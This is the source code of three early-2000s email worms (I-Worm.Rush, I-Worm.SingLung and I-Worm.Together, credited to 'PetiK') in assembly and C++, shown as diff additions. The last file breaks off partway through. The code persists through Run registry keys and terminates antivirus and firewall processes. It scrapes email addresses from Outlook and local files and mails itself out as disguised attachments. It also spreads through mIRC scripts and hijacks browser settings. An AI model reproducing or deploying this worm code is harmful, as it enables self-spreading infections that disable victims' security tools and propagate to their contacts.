+	mov   edi,offset copy_worm
+	push  edi
+	push  50
+	push  edi
+	callx GetSystemDirectoryA
+	add   edi,eax
+	mov   eax,"iaM\"
+	stosd
+	mov   eax,".23l"
+	stosd
+	mov   eax,"exe"
+	stosd
+	pop   edi
+
+	push  0
+	push  edi
+	push  esi
+	callx CopyFileA
+	
+	push  8
+	push  edi
+	push  1
+	@pushsz "Mail Outlook"
+	@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
+	push  80000002h
+	callx SHSetValueA
+
+check_date:
+	push  offset SystemTime
+	callx GetSystemTime
+	cmp   [SystemTime.wDayOfWeek],03h
+	jne   beep1
+cdrom_open:
+	push  00h
+	push  00h
+	push  00h
+	@pushsz "open cdaudio"
+	callx mciSendStringA
+	push  00h
+	push  00h
+	push  00h
+	@pushsz "set cdaudio door open"
+	callx mciSendStringA
+	
+beep1:	push  offset SystemTime
+	callx GetSystemTime
+	cmp   [SystemTime.wDay],03h
+	jne   special_folder
+	mov   counter,0
+beep2:	inc   counter
+	push  30h
+	callx MessageBeep
+	push  1
+	callx Sleep
+	cmp   counter,5000
+	jne   beep2
+
+special_folder:
+	push  00h
+	push  05h
+	push  offset personal
+	push  00h
+	callx SHGetSpecialFolderPathA
+	@pushsz "\Read_Me.txt"
+	push  offset personal
+	callx lstrcat
+
+txt_file:
+	push  00h
+	push  01h
+	push  02h
+	push  00h
+	push  01h
+	push  40000000h
+	push  offset personal
+	callx CreateFileA
+	mov   [FileHdl],eax
+	push  00h
+	push  offset octets
+	push  TXTSIZE
+	push  offset txtd
+	push  [FileHdl]
+	callx WriteFile
+	push  [FileHdl]
+	callx CloseHandle
+
+vbs_file:
+	pushad
+	push  00h
+	push  80h
+	push  02h
+	push  00h
+	push  01h
+	push  40000000h
+	@pushsz "C:\rushhour.vbs"
+	callx CreateFileA
+	xchg  edi,eax
+	push  00h
+	push  offset octets
+	push  VBSSIZE
+	push  offset vbsd
+	push  edi
+	callx WriteFile
+	push  edi
+	callx CloseHandle
+	popad
+	push  1
+	@pushsz "wscript C:\rushhour.vbs"
+	callx WinExec
+	push  2000
+	callx Sleep
+	@pushsz "C:\rushhour.vbs"
+	callx DeleteFileA
+
+	push  offset SystemTime
+	callx GetSystemTime
+	cmp   [SystemTime.wDay],0Fh
+	jne   start_scan
+
+	call  internet_page
+
+start_scan:
+	mov   edi,offset mailbook
+	push  edi
+	push  50
+	push  edi
+	callx GetWindowsDirectoryA	
+	add   edi,eax
+	mov   eax,"iaM\"
+	stosd
+	mov   eax,"ooBl"
+	stosd
+	mov   eax,"xt.k"
+	stosd
+	mov   ax,"t"
+	stosd	
+	xor   eax,eax
+	stosd
+
+open_scan_file:
+	pushad
+	push  00h
+	push  80h
+	push  03h
+	push  00h
+	push  01h
+	push  80000000h
+	push  offset mailbook
+	callx CreateFileA
+	inc   eax
+	je    not_exist
+	dec   eax
+	xchg  eax,ebx
+
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  eax
+	push  2
+	push  eax
+	push  ebx
+	callx CreateFileMappingA
+	test  eax,eax
+	je    F1
+	xchg  eax,ebp
+
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  eax
+	push  4
+	push  ebp
+	callx MapViewOfFile
+	test  eax,eax
+	je    F2
+	xchg  eax,esi
+
+	push  0
+	push  ebx
+	callx GetFileSize
+	cmp   eax,3
+	jbe   F3
+
+scan_file:
+	xor   edx,edx
+	mov   edi,offset mail_addr
+	push  edi
+	p_c:  lodsb
+	cmp   al," "
+	je    car_s
+	cmp   al,0dh
+	je    entr1
+	cmp   al,0ah
+	je    entr2
+	cmp   al,"#"
+	je    f_mail
+	cmp   al,"@"
+	jne   not_a
+	inc   edx
+	not_a:	stosb
+		jmp p_c
+	car_s:	inc esi
+		jmp p_c
+	entr1:	xor al,al
+		stosb
+		pop edi
+		test edx,edx
+		je  scan_file
+		call send_mail
+		jmp scan_file
+	entr2:	xor al,al
+		stosb
+		pop edi
+		jmp scan_file
+	f_mail:
+
+	F3:	push  esi	
+	callx UnmapViewOfFile
+	F2:	push  ebp
+	callx CloseHandle
+	F1:	push  ebx
+	callx CloseHandle
+	not_exist:
+	popad
+
+scan_window:mov  counter,0
+win1:	inc   counter
+	cmp   counter,1000000
+	je    end_w
+	@pushsz "Norton AntiVirus"
+	push  00h
+	callx FindWindowA
+	test  eax,eax
+	jz    win2
+	jmp   change_nav
+win2:	@pushsz "System Properties"
+	push  00h
+	callx FindWindowA
+	test  eax,eax
+	jz    win3
+	jmp   show_window
+win3:	@pushsz "Microsoft Home Page - Microsoft Internet Explorer"
+	push  00h
+	callx FindWindowA
+	test  eax,eax
+	jz    win1
+	jmp   display_message
+change_nav:
+	mov   edi,eax
+	@pushsz "Norton Virus : W32.Norton.Worm@mm"
+	push  edi
+	callx SetWindowTextA
+	jmp   win1
+show_window:
+	mov   edi,eax	
+	push  2
+	push  edi
+	callx ShowWindow
+	jmp   win1
+display_message:
+	mov   edi,eax
+	push  10h
+	@pushsz "Microsoft Internet Explorer"
+	@pushsz "You don't have access to this page"
+	push  00h
+	callx MessageBoxA
+	push  0
+	push  edi
+	callx ShowWindow
+	jmp   win1
+
+end_w:	push  00h
+	callx ExitProcess
+
+hide_worm:
+	pushad
+	@pushsz "Kernel32.dll"
+	callx GetModuleHandleA
+	xchg  eax,ecx
+	jecxz end_hide_worm
+	@pushsz "RegisterServiceProcess"
+	push  ecx
+	callx GetProcAddress
+	xchg  eax,ecx
+	jecxz end_hide_worm
+	push  1
+	push  0
+	call  ecx
+	end_hide_worm:
+	popad
+	ret
+
+internet_page:
+	pushad
+	call  diff_val
+	db    "Search Page",0
+	db    "Start Page",0
+	db    "Local Page",0
+	diff_val:
+	pop   esi
+	push  3
+	pop   ecx
+	page_loop:
+	push  ecx
+	push  32
+	@pushsz "http://www.petik.fr.fm"
+	push  1
+	push  esi
+	@pushsz "Software\Microsoft\Internet Explorer\Main"
+	push  80000001h
+	callx SHSetValueA
+	@endsz
+	pop   ecx
+	loop  page_loop
+	popad
+	ret
+
+send_mail:
+	xor   eax,eax
+	push  eax
+	push  eax
+	push  offset Message
+	push  eax
+	push  [MAPIHdl]
+	callx MAPISendMail
+	ret
+	
+
+
+.data
+; === copy_worm ===
+orig_worm	db 50 dup (0)
+copy_worm	db 50 dup (0)
+
+; === beep ===
+counter		dd ?
+
+; === special_folder ===
+personal	db 70 dup (0)
+octets		dd ?
+FileHdl		dd ?
+
+; === scan email ===
+mailbook	db 50 dup (0)
+mail_addr	db 128 dup (?)
+MAPIHdl		dd 0
+name_mail	db "ScanVir_25.exe",0
+
+
+
+
+subject		db "New Scan Virus...",0
+body		db "Hi man,",0dh,0ah
+		db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
+		db "Look at the file attached.",0dh,0ah,0dh,0ah
+		db 09h,09h,09h,09h,"Bye and have a nice day.",0
+namefrom	db "Your Best Friend",0
+
+Message		dd ?
+		dd offset subject
+		dd offset body
+		dd ?
+		dd ?
+		dd ?
+		dd 2
+		dd offset MsgFrom
+		dd 1
+		dd offset MsgTo
+		dd 1
+		dd offset Attach
+
+MsgFrom		dd ?
+		dd namefrom
+		dd ?
+		dd ?
+		dd ?
+
+MsgTo		dd ?
+		dd 1
+		dd offset mail_addr
+		dd offset mail_addr
+		dd ?
+		dd ?
+
+Attach		dd ?
+		dd ?
+		dd ?
+		dd offset orig_worm
+		dd offset name_mail
+		dd ?
+		
+
+		
+
+txtd:	db "Hi man,",0dh,0ah,0dh,0ah
+	db "I don't want to destroy your computer.",0dh,0ah
+	db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
+	db 09h,09h,09h,"PetiK",00h
+TXTSIZE	equ $-txtd
+
+vbsd:	db 'On Error Resume Next',0dh,0ah
+	db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
+	db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
+	db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
+	db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
+	db 'txt.Close',0dh,0ah
+	db 'For Each M In chan.AddressLists',0dh,0ah
+	db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
+	db 'For O=1 To M.AddressEntries.Count',0dh,0ah
+	db 'Set P=M.AddressEntries(O)',0dh,0ah
+	db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
+	db 'txt.WriteLine P.Address',0dh,0ah
+	db 'txt.Close',0dh,0ah
+	db 'Next',0dh,0ah
+	db 'End If',0dh,0ah
+	db 'Next',0dh,0ah
+	db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
+	db 'txt.WriteLine "#"',0dh,0ah
+	db 'txt.Close',0dh,0ah
+VBSSIZE	equ $-vbsd
+
+signature	db "I-Worm.Rush",00h
+origine		db "A worm made in France",00h
+author		db "Written by PetiK - 2001",00h
+
+end start
+end

Win32/I-Worm.SingLung.c

@@ -0,0 +1,340 @@
+/*
+Name : I-Worm.SingLung
+Author : PetiK
+Date : January 23rd 2002 - January 26th 2002
+Language : C++/Win32asm
+
+Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
+*/
+
+#include <stdio.h>
+#include <windows.h>
+#include <mapi.h>
+#include <tlhelp32.h>
+#pragma argused
+#pragma inline
+
+
+char 	filename[100],sysdir[100],sysdr[100],winhtm[100];
+LPSTR 	Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
+	SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
+int	i;
+HANDLE	fd,lSnapshot,myproc;
+BOOL	rProcessFound;
+BYTE	desktop[50],favoris[50],personal[50],cache[50];
+DWORD	sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
+	sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
+DWORD	type=REG_SZ;
+FILE	*stopv;
+
+LHANDLE session;
+MapiMessage mess;
+MapiRecipDesc from;
+HINSTANCE hMAPI;
+
+HKEY		hReg;
+PROCESSENTRY32 	uProcess;
+SYSTEMTIME	systime;
+WIN32_FIND_DATA	ffile;
+HDC		dc;
+
+void Welcome();
+void StopAV(char *);
+void FindFile(char *,char *);
+void GetMail(char *,char *);
+void sendmail(char *);
+void FeedBack();
+
+//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
+ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
+
+
+int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
+{
+	/*
+	// Worm in RegisterServiceProcess
+	HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
+	if(kern32) {
+		(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
+		if(RegSerPro)
+		RegSerPro(NULL,1);
+	}	*/
+
+// Fuck some AntiVirus hahahaha
+StopAV("AVP32.EXE");		// AVP
+StopAV("AVPCC.EXE");		// AVP
+StopAV("AVPM.EXE");		// AVP
+StopAV("WFINDV32.EXE");		// Dr. Solomon
+StopAV("F-AGNT95.EXE");		// F-Secure
+StopAV("NAVAPW32.EXE");		// Norton Antivirus
+StopAV("NAVW32.EXE");		// Norton Antivirus
+StopAV("NMAIN.EXE");		// Norton Antivirus
+StopAV("PAVSCHED.EXE");		// Panda AntiVirus
+StopAV("ZONEALARM.EXE");	// ZoneAlarm
+
+GetModuleFileName(hInst,filename,100);
+GetSystemDirectory((char *)sysdir,100);
+
+strcpy(sysdr,sysdir);
+strcat(sysdr,"\\MSGDI32.EXE");
+if((lstrcmp(filename,sysdr))!=0) {
+	Welcome();
+	}
+else
+	{
+	hMAPI=LoadLibrary("MAPI32.DLL");
+	(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
+	RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
+	RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
+	RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
+	RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
+	RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
+	RegCloseKey(hReg);
+	GetWindowsDirectory((char *)winhtm,100);
+
+_asm
+{
+call	@wininet
+db	"WININET.DLL",0
+@wininet:
+call	LoadLibrary
+test	eax,eax
+jz	end_asm
+mov	ebp,eax
+call	@inetconnect
+db	"InternetGetConnectedState",0
+@inetconnect:
+push	ebp
+call	GetProcAddress
+test	eax,eax
+jz	end_wininet
+mov	edi,eax
+verf:
+push	0
+push	Tmp
+call	edi
+dec	eax
+jnz	verf
+
+end_wininet:
+push	ebp
+call	FreeLibrary
+end_asm:
+jmp	end_all_asm
+
+Tmp	dd 0
+
+end_all_asm:
+}
+
+	FindFile(desktop,"*.htm");
+	FindFile(favoris,"*.ht*");
+	FindFile(personal,"*.ht*");
+	FindFile(personal,"*.doc");
+	FindFile(winhtm,".ht*");
+	FindFile(cache,".ht*");
+	FreeLibrary(hMAPI);
+	FeedBack();
+	}
+
+strcat(sysdir,"\\MsGDI32.exe");
+CopyFile(filename,sysdir,FALSE);
+RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
+RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
+RegCloseKey(hReg);
+
+}
+
+void Welcome()
+{
+register char fileWel[100],messWel[25],titWel[25];
+strcpy(fileWel,filename);
+fileWel[0]=0;
+for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
+wsprintf(titWel,"Error - %s",fileWel+i+1);
+wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
+MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
+}
+
+
+void StopAV(char *antivirus)
+{
+register BOOL term;
+lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
+uProcess.dwSize=sizeof(uProcess);
+rProcessFound=Process32First(lSnapshot,&uProcess);
+while(rProcessFound) {
+	if(strstr(uProcess.szExeFile,antivirus)!=NULL) {	// Norton Antivirus
+		myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
+		if(myproc!=NULL) {
+			term=TerminateProcess(myproc,0);
+		}
+		CloseHandle(myproc);
+	}
+	rProcessFound=Process32Next(lSnapshot,&uProcess);
+}
+CloseHandle(lSnapshot);
+}
+
+
+void FindFile(char *folder, char *ext)
+{
+register bool abc=TRUE;
+register HANDLE hFile;
+char mail[128];
+SetCurrentDirectory(folder);
+hFile=FindFirstFile(ext,&ffile);
+if(hFile!=INVALID_HANDLE_VALUE) {
+	while(abc) {
+	SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
+	GetMail(ffile.cFileName,mail);
+	if(strlen(mail)>0) {
+	WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
+	sendmail(mail);
+	}
+	abc=FindNextFile(hFile,&ffile);
+	}
+}
+
+}
+
+void GetMail(char *namefile, char *mail)
+{
+HANDLE	hf,hf2;
+char	*mapped;
+DWORD	size,i,k;
+BOOL	test=FALSE,valid=FALSE;
+mail[0]=0;
+
+hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
+if(hf==INVALID_HANDLE_VALUE)
+	return;
+size=GetFileSize(hf,NULL);
+if(!size)
+	return;
+if(size<8)
+	return;
+size-=100;
+
+hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
+if(!hf2) {
+	CloseHandle(hf);
+	return;
+	}
+
+mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
+if(!mapped) {
+	CloseHandle(hf2);
+	CloseHandle(hf);
+	return;
+	}
+
+i=0;
+while(i<size && !test) {
+if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
+	test=TRUE;
+	i+=strlen("mailto:");
+	k=0;
+	while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
+		if(mapped[i]!=' ') {
+			mail[k]=mapped[i];
+			k++;
+			if(mapped[i]=='@')
+				valid=TRUE;
+		}
+		i++;
+	}
+	mail[k]=0;
+	} else
+	i++;
+}
+
+if(!valid)
+	mail[0]=0;
+UnmapViewOfFile(mapped);
+CloseHandle(hf2);
+CloseHandle(hf);
+return;
+}
+
+void sendmail(char *tos)
+{
+memset(&mess,0,sizeof(MapiMessage));
+memset(&from,0,sizeof(MapiRecipDesc));
+
+from.lpszName=NULL;
+from.ulRecipClass=MAPI_ORIG;
+mess.lpszSubject="Secret for you...";
+mess.lpszNoteText="Hi Friend,\n\n"
+		"I send you my last work.\n"
+		"Mail me if you have some suggests.\n\n"
+		"	See you soon. Best Regards.";
+
+mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
+	if(!mess.lpRecips)
+	return;
+memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
+mess.lpRecips->lpszName=tos;
+mess.lpRecips->lpszAddress=tos;
+mess.lpRecips->ulRecipClass=MAPI_TO;
+mess.nRecipCount=1;
+
+mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
+	if(!mess.lpFiles)
+	return;
+memset(mess.lpFiles,0,sizeof(MapiFileDesc));
+mess.lpFiles->lpszPathName=filename;
+mess.lpFiles->lpszFileName="My_Work.exe";
+mess.nFileCount=1;
+
+mess.lpOriginator=&from;
+
+mSendMail(0,0,&mess,0,0);
+
+free(mess.lpRecips);
+free(mess.lpFiles);
+}
+
+
+void FeedBack()
+{
+GetSystemTime(&systime);
+switch(systime.wDay) {
+case 7:
+	MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
+			"With this, you stop the life of women and children.",
+			"Message to USA",MB_OK|MB_ICONHAND);
+	break;
+
+case 11:
+	dc=GetDC(NULL);
+	if(dc)
+	{
+	TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
+	}
+	ReleaseDC(NULL,dc);
+	break;
+
+case 28:
+	stopv=fopen("StopIntifada.htm","w");
+	fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
+	fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
+	fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
+	fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
+	fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
+	fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
+	fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
+	fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
+	fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
+	fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
+	fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
+	fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
+	fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
+	fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
+	fprintf(stopv,"</body></html>");
+	fclose(stopv);
+	ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
+	
+	break;
+}
+}

Win32/I-Worm.Together.asm

@@ -0,0 +1,514 @@
+comment #
+Name : I-Worm.Together
+Author : PetiK
+Date : March 10th 2002 - March 15th 2002
+
+#
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+api macro a
+extrn a:proc
+call a
+endm
+
+PROCESSENTRY32 STRUCT
+       dwSize              DWORD ?
+       cntUsage            DWORD ?
+       th32ProcessID       DWORD ?
+       th32DefaultHeapID   DWORD ?
+       th32ModuleID        DWORD ?
+       cntThreads          DWORD ?
+       th32ParentProcessID DWORD ?
+       pcPriClassBase      DWORD ?
+       dwFlags             DWORD ?
+       szExeFile           db 260 dup(?)
+PROCESSENTRY32 ENDS
+
+include Useful.inc
+
+start_worm:	call	hide_worm
+
+twin_worm:
+	push	50
+	mov	esi,offset orig_worm
+	push	esi
+	push	0
+	api	GetModuleFileNameA			; esi = name of file
+
+	push	50
+	push	offset verif_worm
+	api	GetSystemDirectoryA
+	@pushsz "\EBASE64.EXE"
+	push	offset verif_worm
+	api	lstrcat
+
+	mov	edi,offset copy_worm
+	push	edi
+	push	50
+	push	edi
+	api	GetSystemDirectoryA
+	add	edi,eax
+	mov	eax,"aBe\"
+	stosd
+	mov	eax,"46es"
+	stosd
+	mov	eax,"exe."
+	stosd
+	pop	edi					; edi = %system%\eBase64.exe
+
+	push	offset orig_worm
+	push	offset verif_worm
+	api	lstrcmp
+	test	eax,eax
+	jz	continue_worm
+
+	push	0
+	push	edi
+	push	esi
+	api	CopyFileA				; copy file
+
+	push	20
+	push	edi
+	push	1
+	@pushsz "Encode Base64"
+	@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
+	push	80000002h
+	api	SHSetValueA				; regedit
+
+	jmp	end_worm
+
+continue_worm:
+
+fuck_antivirus:
+	@pushsz "OIFIL400.DLL"
+	api	LoadLibraryA
+	test	eax,eax
+	jz	end_fuck_antivirus
+
+	push	0
+	push	2
+	api	CreateToolhelp32Snapshot
+
+	mov	lSnapshot, eax
+
+	inc	eax
+	jz	end_fuck_antivirus
+
+	lea	eax,uProcess
+	mov	[eax.dwSize], SIZE PROCESSENTRY32
+
+	lea	eax,uProcess
+	push	eax
+	push	lSnapshot
+	api	Process32First
+
+checkfile:
+	test	eax, eax
+	jz	InfExpRetCl
+	push	ecx
+
+	mov	eax,ProcessID
+	push	offset uProcess
+	cmp	eax,[uProcess.th32ProcessID]
+	je	NextFile
+
+	lea	ebx,[uProcess.szExeFile]
+
+verif	macro	verifname,empty
+		local   name
+		ifnb    <empty>
+		%out    too much arguments in macro 'nxt_instr'
+		.err
+		endif
+		call	name
+		db	verifname,0
+		name:
+		push	ebx
+		api	lstrstr
+		test	eax,eax
+endm
+
+	verif	"ARG"			; Norton
+	jnz	term
+	verif	"AVP32.EXE"		; AVP
+	jnz	term
+	verif	"AVPCC.EXE"		; AVP
+	jnz	term
+	verif	"AVPM.EXE"		; AVP
+	jnz	term
+	verif	"WFINDV32.EXE"		
+	jnz	term
+	verif	"F-AGNT95.EXE"		; F-SECURE
+	jnz	term
+	verif	"NAVAPW32.EXE"		; Norton
+	jnz	term
+	verif	"NAVW32.EXE"		; Norton
+	jnz	term
+	verif	"NMAIN.EXE"
+	jnz	term
+	verif	"PAVSHED.EXE"		; PandaSoftware
+	jnz	term
+	verif	"vshwin32.exe"		; McAfee
+	jnz	term
+	verif	"PETIKSHOW.EXE"		; McAfee
+	jnz	term
+	
+	@pushsz "ZONEALARM.EXE"
+	push	ebx
+	api	lstrstr
+	test	eax,eax
+	jz	NextFile
+
+term:	push	[uProcess.th32ProcessID]
+	push	1
+	push	001F0FFFh
+	api	OpenProcess
+	test	eax,eax
+	jz	NextFile
+	push	0
+	push	eax
+	api	TerminateProcess
+
+	push	ebx
+	push	offset new_name
+	api	lstrcpy
+	mov	esi,offset new_name
+	push	esi
+	api	lstrlen
+	add	esi,eax
+	sub	esi,4
+	mov	[esi],"ktp."
+	lodsd
+;	mov	[esi],"kmz."
+;	lodsd
+
+	push	0
+	push	offset new_name
+	push	ebx
+	api	CopyFileA
+	push	ebx
+	api	DeleteFileA
+
+NextFile:
+	push	offset uProcess
+	push	lSnapshot
+	api	Process32Next
+	jmp	checkfile
+
+InfExpRetCl:
+	push	lSnapshot
+	api	CloseHandle
+end_fuck_antivirus:
+
+call	Spread_Mirc
+call	Spread_Worm
+e_s_w:
+
+end_worm:
+	push	0
+	api	ExitProcess
+
+hide_worm	Proc
+	pushad
+	@pushsz	"KERNEL32.DLL"
+	api	GetModuleHandleA
+	xchg	eax,ecx
+	jecxz	end_hide_worm
+	@pushsz	"RegisterServiceProcess"		; Registered as Service Process
+	push	ecx
+	api	GetProcAddress
+	xchg	eax,ecx
+	jecxz	end_hide_worm
+	push	1
+	push	0
+	call	ecx
+	end_hide_worm:
+	popad
+	ret
+hide_worm	EndP
+
+Spread_Mirc	Proc
+	push	offset copy_worm
+	push	offset mirc_exe
+	api	lstrcpy
+	call	@mirc
+	db 	"C:\mirc\script.ini",0
+	db 	"C:\mirc32\script.ini",0		; spread with mIRC. Thanx to Microsoft.
+	db 	"C:\progra~1\mirc\script.ini",0
+	db 	"C:\progra~1\mirc32\script.ini",0
+	@mirc:
+	pop	esi
+	push	4
+	pop	ecx
+	mirc_loop:
+	push	ecx
+	push	0
+	push	80h
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	esi
+	api	CreateFileA
+	mov	ebp,eax
+	push	0
+	push	offset byte_write
+	@tmp_mirc:
+	push	e_mirc - s_mirc
+	push	offset s_mirc
+	push	ebp
+	api	WriteFile
+	push	ebp
+	api	CloseHandle
+	@endsz
+	pop	ecx
+	loop	mirc_loop
+	end_spread_mirc:
+	ret
+Spread_Mirc	EndP
+
+Spread_Worm		Proc
+	pushad
+	push	50
+	push	offset vbs_worm
+	api	GetSystemDirectoryA
+	@pushsz "\eBase.vbs"
+	push	offset vbs_worm
+	api	lstrcat
+
+	push	0
+	push	20h
+	push	2
+	push	0
+	push	1
+	push	40000000h
+	push	offset vbs_worm
+	api	CreateFileA
+	mov	ebp,eax
+	push	0
+	push	offset byte_write
+	push	e_vbs - s_vbs
+	push	offset s_vbs
+	push	ebp
+	api	WriteFile
+	push	ebp
+	api	CloseHandle
+
+	push	1
+	push	0
+	push	0
+	push	offset vbs_worm
+	@pushsz "open"
+	push	0
+	api	ShellExecuteA
+
+verif_inet:
+	push	0
+	push	offset inet
+	api	InternetGetConnectedState
+	dec	eax
+	jnz	verif_inet
+
+	push	50
+	push	offset t_ini
+	api	GetSystemDirectoryA
+	@pushsz "\together.ini"
+	push	offset t_ini
+	api	lstrcat
+
+	push	00h
+	push	80h
+	push	03h
+	push	00h
+	push	01h
+	push	80000000h
+	push	offset t_ini
+	api	CreateFileA
+	inc	eax
+	je	end_spread_worm
+	dec	eax
+	xchg	eax,ebx
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	eax
+	push	2
+	push	eax
+	push	ebx
+	api	CreateFileMappingA
+	test	eax,eax
+	je	end_s1
+	xchg	eax,ebp
+
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	eax
+	push	4
+	push	ebp
+	api	MapViewOfFile
+	test	eax,eax
+	je	end_s2
+	xchg	eax,esi
+
+	push	0
+	push	ebx
+	api	GetFileSize
+	cmp	eax,4
+	jbe	end_s3
+
+scan_mail:
+	xor	edx,edx
+	mov	edi,offset mail_addr
+	push	edi
+	p_c:	lodsb
+	cmp	al," "
+	je	car_s
+	cmp	al,";"
+	je	end_m
+	cmp	al,"#"
+	je	f_mail
+	cmp	al,'@'
+	jne	not_a
+	inc	edx
+	not_a:	stosb
+		jmp p_c
+	car_s:	inc esi
+		jmp p_c
+	end_m:	xor al,al
+		stosb
+		pop edi
+		test edx,edx
+		je  scan_mail
+		call send_mail
+		jmp scan_mail
+	f_mail:
+
+end_s3:	push	esi
+	api	UnmapViewOfFile
+end_s2:	push	ebp
+	api	CloseHandle
+end_s1:	push	ebx
+	api	CloseHandle
+
+	end_spread_worm:
+	popad
+	jmp	e_s_w
+Spread_Worm		EndP
+
+send_mail:
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	offset Message
+	push	eax
+	push	[sess]
+	api	MAPISendMail
+	ret
+
+
+.data
+; === Copy Worm ===
+orig_worm	db 50 dup (0)
+copy_worm	db 50 dup (0)
+verif_worm	db 50 dup (0)
+sysTime		db 16 dup(0)
+
+; === Fuck AntiVirus ===
+uProcess	PROCESSENTRY32 <?>
+ProcessID	dd ?
+lSnapshot	dd ?
+new_name	db 100 dup (?)
+
+; === Spread With mIrc ===
+s_mirc:	db "[script]",CRLF
+	db ";Don't edit this file.",CRLF,CRLF
+	db "n0=on 1:JOIN:{",CRLF
+	db "n1= /if ( $nick == $me ) { halt }",CRLF
+	db "n2= /.dcc send $nick "
+mirc_exe	db 50 dup (?)
+	db CRLF,"n3=}",0
+e_mirc:
+byte_write	dd ?
+
+; === Spread with Outlook ===
+vbs_worm	db 50 dup (0)
+t_ini		db 50 dup (0)
+mail_addr	db 128 dup (?)
+inet		dd 0
+sess		dd 0
+
+subject		db "Re: Answer",0
+body		db "Here for you...",0
+filename	db "funny_game.exe",0
+
+Message		dd ?
+		dd offset subject
+		dd offset body
+		dd ?
+		dd ?
+		dd ?
+		dd 2
+		dd offset MsgFrom
+		dd 1
+		dd offset MsgTo
+		dd 1
+		dd offset Attach
+
+MsgFrom		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+
+MsgTo		dd ?
+		dd 1
+		dd offset mail_addr
+		dd offset mail_addr
+		dd ?
+		dd ?
+
+Attach		dd ?
+		dd ?
+		dd ?
+		dd offset orig_worm
+		dd offset filename
+		dd ?
+
+
+s_vbs:		
+	db 'On Error Resume Next',CRLF
+	db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
+	db 'Set sys=fs.GetSpecialFolder(1)',CRLF
+	db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
+	db 'c.Close',CRLF
